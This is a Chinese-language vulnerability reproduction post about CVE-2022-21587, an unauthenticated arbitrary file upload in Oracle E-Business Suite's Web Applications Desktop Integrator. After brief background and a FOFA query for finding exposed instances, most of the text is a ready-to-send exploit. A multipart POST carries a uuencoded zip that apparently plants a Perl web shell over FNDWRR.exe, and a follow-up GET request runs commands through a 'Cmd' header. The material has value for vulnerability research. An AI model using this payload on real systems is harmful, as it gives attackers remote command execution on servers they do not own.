Oracle E-Business Suite软件任意文件上传漏洞（CVE-2022-21587）

本文介绍: Or acl e E-Busin es s Sui te 的 Or acle Web Ap pli cat ion s Des k top Integ r ato r 接口BneViewerXMLSer v ice处存在任意文件上传漏洞，未经身份验证的攻击者通过上传恶意的web shell 文件，获取服务器权限。

0x01 产品 简介

Oracle E-Busin es s Suite（电子商务套件）是美国甲骨文（Oracle）公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。

0x02 漏洞 概述

Oracle E-Busin es s Suite 的 Or acle Web Ap pli cat ion s Desktop Integrator 接口BneViewerXMLServ ice处存在任意文件上传漏洞，未经身份验证的攻击者通过上传恶意的web sh ell文件，获取服务器权限。

0x03 影响 范围

Oracle Web Ap pli cat ion s Desktop Integrator 12.2.3-12.2.11版本

0x04 复现 环境

FOFA：app=”Oracle-E-Busin es s-Suite”

0x05 漏洞 复现

Exp

POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv

------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="bne:uueupload"

TRUE
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"

begin 664 test.zip
M4$L#!!0``````)QQ/%8&amp;2`KJ<0```'$```!#````+BXO+BXO+BXO+BXO+BXO
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&amp;5A9&amp;5R*"`M='EP92`]/B`G
M=&amp;5X="]P;&amp;%I;B<@*3L*;7D@)&amp;-M9"`]($-'23HZ:'1T<"@G2%144%]#340G
M*3L*<')I;G0@<WES=&amp;5M*"1C;60I.PIE&gt;&amp;ET(#`[4$L!`A0#%```````G'$
M5@9("NIQ````<0```$,``````````````*2!`````"XN+RXN+RXN+RXN+RXN
M+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R:7!T<R]T>&amp;M&amp;
>3D174E(N<&amp;Q02P4&amp;``````$``0!Q````T@``````
`
end
------WebKitFormBoundaryZsMro0UsAQYLDZGv--

上传带命令回显的马子

RCE

GET /OA_CGI/FNDWRR.exe HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: whoami
Accept-Encoding: gzip